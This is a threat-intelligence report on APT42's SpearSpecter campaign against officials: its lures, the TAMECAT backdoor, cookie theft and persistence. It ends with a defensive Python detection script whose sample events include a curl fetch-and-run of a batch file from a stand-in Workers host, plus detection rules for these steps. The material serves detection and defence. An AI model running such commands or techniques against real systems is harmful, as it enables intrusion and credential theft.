Iran-Linked SpearSpecter Campaign Leveraging Personalized Social Engineering Against High-Value Officials

Iranian threat actors aligned with the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO) are conducting a sophisticated espionage campaign tracked as SpearSpecter, systematically targeting high-value senior defense and government officials through personalized social engineering tactics.

The threat group, operating under multiple aliases including APT42, Mint Sandstorm, Educated Manticore, and CharmingCypress, has demonstrated remarkable patience and adaptability in its operations.

Unlike traditional mass phishing campaigns, SpearSpecter operators invest days or weeks developing authentic-seeming relationships with their targets. The threat actors conduct extensive reconnaissance via social media, public databases, and professional networks to gather deep intelligence on victims.

They craft believable scenarios involving exclusive conferences or strategic meetings, sustaining multi-day conversations to build credibility.

Notably, operators now extend engagement via direct WhatsApp communication, adding familiarity and legitimacy to their social engineering efforts.

The campaign broadens its scope by targeting family members of primary targets, thereby widening the attack surface and increasing pressure on high-value officials.

This approach enables the threat actors to impersonate individuals from the victim’s affiliations and create highly personalized lures that are difficult to detect.

Advanced Technical Capabilities

Within the SpearSpecter campaign, attackers tailor their approach to the target's value and their operational objectives. For credential harvesting, they direct victims to crafted, spoofed meeting pages that capture credentials in real time.

For long-term access, operators deploy TAMECAT, a sophisticated PowerShell-based backdoor with modular components designed to facilitate data exfiltration and remote control.

The initial access chain exploits Windows native features, including the abuse of the search-ms URI protocol handler to trigger pop-up prompts that ask users to “Open Windows Explorer”.

Figure: Chrome prompt asking the user to confirm Explorer access requested by the web page.

When victims confirm, Explorer connects to the attacker’s WebDAV server, displaying malicious LNK files disguised as PDFs. Clicking these shortcuts silently executes commands that fetch and run batch scripts from Cloudflare Workers.

Figure: Initial access LNK file shared via WebDAV, pretending to be a PDF file.

Recent SpearSpecter activity marks the first recorded instance of APT42 using Telegram and Discord as command-and-control channels alongside traditional HTTPS infrastructure.

All data transfers are encrypted with AES-256, using hardcoded encryption keys and random initialization vectors that are transmitted in custom HTTP headers.

The TAMECAT backdoor listens for commands from the attacker’s Telegram bot and dynamically loads additional PowerShell payloads from different Cloudflare Workers domains depending on operational objectives.

The Discord C2 mechanism uses webhooks to send messages and retrieves commands using bot tokens and channel IDs, searching for messages from specific users.

This collaborative workspace approach allows actors to deliver unique commands to individual infected hosts while coordinating multiple attacks through a single infrastructure.

Extensive Data Collection

TAMECAT implements targeted reconnaissance and data harvesting, deliberately collecting high-value artifacts including documents, browser data, system information, and screenshots.

Figure: TAMECAT's in-memory loader chain.

The malware’s FileCrawler module focuses on specific file types including documents, spreadsheets, presentations, media files, and archives while excluding noisy locations like cloud sync folders and system directories.

Browser data extraction demonstrates sophisticated evasion techniques, including exploiting Microsoft Edge’s native remote debugging capabilities on port 9222 to retrieve fully decrypted cookies without parsing locked databases. For Chrome, operators use the Sysinternals PsSuspend tool to temporarily suspend the browser process, releasing file locks to access profile databases.

The Screen module captures 50 screenshots at 15-second intervals, immediately uploading each image before deletion to reduce forensic traces.

Attackers also target Outlook mailbox cache files, copying OST files from profile directories and exfiltrating them in chunks over encrypted channels.

TAMECAT maintains persistence through multiple mechanisms, including a “Renovation” Run registry key that executes batch files at logon and the UserInitMprLogonScript registry value that runs lightweight beacon scripts communicating with Firebase Realtime Database.

The malware leverages living-off-the-land binaries including conhost.exe, cmd.exe, curl.exe, and msedge.exe to blend malicious actions with standard system activity.

Runs.dll is a tiny .NET helper that reads a byte range from a file and returns that slice, Base64-encoded, to PowerShell.

Code obfuscation techniques include splitting payloads into dozens of Base64-encoded fragments that are reassembled at runtime, while configuration values are injected dynamically to keep static samples sterile.

Most functionality executes directly in memory, with recent samples storing victim identifiers in registry keys rather than disk files, reflecting evolution toward stealthier operations.

Mitigations

Researchers assess with high confidence that SpearSpecter is operated by Iranian state-aligned operators working on behalf of the IRGC-IO.

The infrastructure leverages Cloudflare Workers for resilient command-and-control, WebDAV-backed hosts on Somee for disposable delivery infrastructure, and cloud platforms including Scalingo and Tebi for staging operations.

Key delivery domains cloudcaravan[.]info and filenest[.]info were both created simultaneously on August 17, 2025, consistent with pre-planned paired staging.

Security experts recommend organizations enable PowerShell script block logging, deploy Sysmon reporting to SIEM solutions, and install EDR products to combat fileless attacks.

The search-ms URI protocol handler should be disabled through registry modifications to prevent exploitation.

Employee awareness programs must emphasize the sophistication of social engineering used by APT42, especially for senior personnel who may possess data of interest to the IRGC.

Network monitoring should establish baselines for legitimate services and alert on deviations, while proxy tools with packet inspection can detect attacker activity such as unusual HTTP headers.
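The logging recommended above (PowerShell script block logging and Sysmon forwarded to a SIEM) only pays off if something actually queries it for the behaviours this article describes. The following is an added example, not code from the original article or from the researchers who reported SpearSpecter: a small rule set in Python that runs over constructed, Sysmon-like process-creation and registry-set events and flags the chain described here: a browser launching Explorer with a search-ms: URI, a WebDAV path in a command line, curl.exe fetching from a Cloudflare Workers host, Edge started with remote debugging on port 9222, PsSuspend aimed at a browser, and the "Renovation" Run key and UserInitMprLogonScript persistence. The event field names, the exact command-line shapes, and the use of the workers.dev domain to represent Cloudflare Workers hosts are assumptions; the sample events are constructed, not captured from a real incident.

```python
import re

# Constructed sample telemetry in a simplified Sysmon-like shape (assumption):
# id 1 = process creation, id 13 = registry value set. None of these lines
# come from a real host; they are illustrative only.
SAMPLE_EVENTS = [
    # Browser hands a search-ms: URI to Explorer, pointing at a WebDAV share
    {"id": 1, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'explorer.exe "search-ms:query=report&crumb=location:\\dav.example.invalid@SSL\DavWWWRoot"'},
    # LNK clicked on the share runs cmd.exe, which pulls a batch file via curl
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c curl.exe -s https://stage.example-worker.workers.dev/run.bat -o %TEMP%\run.bat && %TEMP%\run.bat"},
    # Edge launched with the remote-debugging port used to read decrypted cookies
    {"id": 1, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"msedge.exe --headless --remote-debugging-port=9222 --user-data-dir=C:\Users\u\AppData\Local\Microsoft\Edge\User Data"},
    # Sysinternals PsSuspend used to release Chrome's database locks
    {"id": 1, "image": r"C:\Users\u\AppData\Local\Temp\pssuspend64.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"pssuspend64.exe chrome.exe"},
    # Persistence: Run key named "Renovation" and UserInitMprLogonScript
    {"id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Renovation"},
    {"id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKU\S-1-5-21-1000\Environment\UserInitMprLogonScript"},
    # Benign activity that must not fire
    {"id": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"chrome.exe --profile-directory=Default"},
    {"id": 1, "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"curl.exe -s https://updates.example.com/manifest.json"},
]


def _proc(pattern):
    """Rule on the command line of a process-creation event."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda e: e["id"] == 1 and bool(rx.search(e.get("cmdline", "")))


def _reg(pattern):
    """Rule on the target value of a registry-set event."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda e: e["id"] == 13 and bool(rx.search(e.get("target", "")))


def _search_ms_from_browser(e):
    # Explorer launched with a search-ms: URI by a browser parent process
    return (e["id"] == 1 and "search-ms:" in e.get("cmdline", "").lower()
            and bool(re.search(r"(chrome|msedge|firefox)\.exe$", e.get("parent", ""), re.I)))


def _pssuspend_on_browser(e):
    return (e["id"] == 1 and bool(re.search(r"pssuspend(64)?\.exe$", e.get("image", ""), re.I))
            and bool(re.search(r"chrome|msedge", e.get("cmdline", ""), re.I)))


# (rule name, predicate) pairs covering the chain described in the article
RULES = [
    ("search-ms handler launched from a browser", _search_ms_from_browser),
    ("WebDAV share referenced in process command line", _proc(r"\\DavWWWRoot")),
    ("curl.exe fetching from Cloudflare Workers", _proc(r"curl(\.exe)?\s.*https?://\S*workers\.dev")),
    ("Edge remote debugging port 9222 enabled", _proc(r"msedge\.exe.*--remote-debugging-port=9222")),
    ("PsSuspend used against a browser process", _pssuspend_on_browser),
    ("Run-key persistence named Renovation", _reg(r"\\CurrentVersion\\Run\\Renovation$")),
    ("UserInitMprLogonScript persistence", _reg(r"\\UserInitMprLogonScript$")),
]


def detect(events):
    """Return one finding per (event, rule) match; an event may hit several rules."""
    findings = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                findings.append({"rule": name, "event": e})
    return findings


def rules_hit(events):
    """Sorted, de-duplicated rule names that fired, for a quick triage summary."""
    return sorted({f["rule"] for f in detect(events)})


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        e = f["event"]
        print(f"[{f['rule']}] {e['image']} :: {e.get('cmdline', e.get('target'))}")
```

The first sample event fires two rules (search-ms from a browser, and the WebDAV path embedded in the URI), which is deliberate: stacking weak signals from one host is what separates this chain from a user opening a legitimate search-ms: link. In a real deployment, the Run-key rule would be widened to any unexpected value name, since "Renovation" is a reported artifact that the operators can rename at will.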
